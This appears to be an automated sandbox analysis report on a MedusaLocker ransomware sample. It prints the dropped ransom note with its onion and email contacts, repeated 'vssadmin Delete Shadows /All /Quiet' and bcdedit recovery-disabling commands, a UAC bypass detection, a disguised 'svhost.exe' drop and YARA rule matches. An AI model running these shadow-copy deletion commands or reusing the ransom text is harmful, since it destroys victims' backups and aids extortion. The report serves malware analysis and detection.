                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Deletes shadow drive data (may be related to ransomware)
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /QuietJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /QuietJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /QuietJump to behavior
                        Source: 98j0BL6iLT.exe, 00000000.00000000.246011078.0000000000A44000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: [LOCKER] Lock drive vssadmin.exe Delete Shadows /All /Quietbcdedit.exe /set {default} recoveryenabled No
                        Source: svhost.exeBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
                        Source: svhost.exe, 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: [LOCKER] Lock drive vssadmin.exe Delete Shadows /All /Quietbcdedit.exe /set {default} recoveryenabled No
                        Source: svhost.exe, 00000001.00000000.249765327.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: [LOCKER] Lock drive vssadmin.exe Delete Shadows /All /Quietbcdedit.exe /set {default} recoveryenabled No
                        Source: vssadmin.exe, 00000004.00000002.258671573.00000000033C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exeDeleteShadows/All/Quiet^n2M
                        Source: vssadmin.exe, 00000004.00000002.258428437.0000000002BDC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00002304- TID: 00001768- CMD: vssadmin.exe Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                        Source: vssadmin.exe, 00000004.00000002.258631163.00000000030F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=computerUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsB|?A
                        Source: vssadmin.exe, 00000004.00000002.258631163.00000000030F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
                        Source: vssadmin.exe, 00000004.00000002.258631163.00000000030F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00002304- TID: 00001768- CMD: vssadmin.exe Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                        Source: vssadmin.exe, 00000004.00000002.258470948.0000000003000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinsta0\Default
                        Source: vssadmin.exe, 00000009.00000002.261277363.0000000003360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinsta0\Default
                        Source: vssadmin.exe, 00000009.00000002.261109888.0000000002F4B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005908- TID: 00005904- CMD: vssadmin.exe Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                        Source: vssadmin.exe, 00000009.00000002.261522788.0000000003620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exeDeleteShadows/All/Quiet
                        Source: vssadmin.exe, 0000000D.00000002.265657426.0000000002CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=computerUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsyvZ
                        Source: vssadmin.exe, 0000000D.00000002.265657426.0000000002CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
                        Source: vssadmin.exe, 0000000D.00000002.265657426.0000000002CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet1vZ
                        Source: vssadmin.exe, 0000000D.00000002.265633749.0000000002C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exeDeleteShadows/All/Quiet
                        Source: vssadmin.exe, 0000000D.00000002.265273437.00000000008E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinsta0\Defaults8
                        Source: vssadmin.exe, 0000000D.00000002.265248671.000000000052C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005932- TID: 00005820- CMD: vssadmin.exe Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                        Source: 98j0BL6iLT.exeBinary or memory string: [LOCKER] Lock drive vssadmin.exe Delete Shadows /All /Quietbcdedit.exe /set {default} recoveryenabled No
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E65DA0 std::ios_base::good,CryptStringToBinaryA,GetProcessHeap,HeapAlloc,CryptStringToBinaryA,CryptImportKey,GetProcessHeap,HeapFree,1_2_00E65DA0

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 98j0BL6iLT.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 98j0BL6iLT.exe, type: SAMPLEMatched rule: Detects MedusaLocker ransomware Author: ditekshen
                        Source: 98j0BL6iLT.exe, type: SAMPLEMatched rule: Detect MedusaLocker ransomware Author: Arkbird_SOLG
                        Source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects MedusaLocker ransomware Author: ditekshen
                        Source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Detects MedusaLocker ransomware Author: ditekshen
                        Source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Detects MedusaLocker ransomware Author: ditekshen
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPEDMatched rule: Detects MedusaLocker ransomware Author: ditekshen
                        Source: 98j0BL6iLT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 98j0BL6iLT.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 98j0BL6iLT.exe, type: SAMPLEMatched rule: MALWARE_Win_MedusaLocker author = ditekshen, description = Detects MedusaLocker ransomware, clamav_sig = MALWARE.Win.Ransomware.MedusaLocker
                        Source: 98j0BL6iLT.exe, type: SAMPLEMatched rule: RAN_MedusaLocker_Aug_2021_1 date = 2021-08-08, hash5 = 0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad, hash4 = c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc, hash3 = a25c0227728878c386ab6dba139976cb10e853dd3cd1eb3623f236ee8e1df212, hash2 = 212e7f5ed4a581b4d778dfef226738c6db56b4b4006526259392d03062587887, hash1 = 4f9a833e79092006c06203a66b41fc9250bcebcee148fea404db75d52035131c, author = Arkbird_SOLG, description = Detect MedusaLocker ransomware, adversary = RaaS, hash6 = f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31, reference = Internal Research, tlp = white
                        Source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_MedusaLocker author = ditekshen, description = Detects MedusaLocker ransomware, clamav_sig = MALWARE.Win.Ransomware.MedusaLocker
                        Source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_MedusaLocker author = ditekshen, description = Detects MedusaLocker ransomware, clamav_sig = MALWARE.Win.Ransomware.MedusaLocker
                        Source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_MedusaLocker author = ditekshen, description = Detects MedusaLocker ransomware, clamav_sig = MALWARE.Win.Ransomware.MedusaLocker
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPEDMatched rule: MALWARE_Win_MedusaLocker author = ditekshen, description = Detects MedusaLocker ransomware, clamav_sig = MALWARE.Win.Ransomware.MedusaLocker
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00EA19FD1_2_00EA19FD
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00EA19501_2_00EA1950
                        Source: 98j0BL6iLT.exe, 00000000.00000003.329283968.000000000323D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exef# vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAdobeARM.exeb! vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.336032061.000000000323F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exef# vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.386685322.0000000003238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exel& vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.326523234.000000000323D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exef# vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.393424723.0000000003237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.373531329.000000000465C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .rsrcfr-cafr-fres-mxes-eszh-hkzh-twVS_VERSION_INFOStringFileInfoOriginalFilenameMUI%s\%s\%s.MUIMUI: %s checksum does not match primary file checksum vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.390600940.0000000003239000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exel& vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.349555389.000000000465F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.332432946.000000000323D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamememdiag.exef# vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.315817825.000000000323F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamememdiag.exeh$ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSFHelper.dll vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIWActs.dllX vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePerfInst.dll\ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.430682796.000000000323A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291506889.0000000003236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.398388716.000000000323A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003466000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.342181593.0000000003231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamememdiag.exef# vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.396374557.0000000003235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.416421687.000000000323E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exev+ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.345672437.000000000323C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.428390812.0000000003236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.380009715.0000000003236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.409712206.0000000003230000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exev+ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArmInst.dllf# vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.310430087.0000000003235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exeh$ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.354875502.0000000004654000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamememdiag.exep( vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.339141754.000000000323B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exef# vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000033FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.302565986.000000000333E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.413881987.000000000323A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exev+ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.394805579.000000000323E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.418707752.0000000003237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamememdiag.exev+ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.377334169.000000000323C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.388690490.000000000323E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamememdiag.exel& vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.421919789.000000000323F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.312480694.0000000003233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exeh$ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.383022799.0000000003233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamememdiag.exej% vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAbcpyDll.dll\ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameADelRCP.dll\ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAcroTgts.dllN vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.411691406.0000000003235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exev+ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.302565986.0000000003230000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .rsrcfr-cafr-fres-mxes-eszh-hkzh-twVS_VERSION_INFOStringFileInfoOriginalFilenameMUI%s\%s\%s.MUIMUI: %s checksum does not match primary file checksum vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.424353002.0000000003237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.392192847.0000000003238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exel& vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003245000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.433220680.0000000003231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamememdiag.exen' vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeZ vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.385146942.000000000323F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exel& vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.401158933.0000000003232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamememdiag.exen' vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003450000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.369349383.000000000323D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArmInst.dllf# vs 98j0BL6iLT.exe
                        Source: 98j0BL6iLT.exe, 00000000.00000003.293380634.000000000465C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E6EED0 std::ios_base::good,OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle,1_2_00E6EED0
                        Source: 98j0BL6iLT.exeReversingLabs: Detection: 90%
                        Source: 98j0BL6iLT.exeVirustotal: Detection: 74%
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile read: C:\Users\user\Desktop\98j0BL6iLT.exeJump to behavior
                        Source: 98j0BL6iLT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
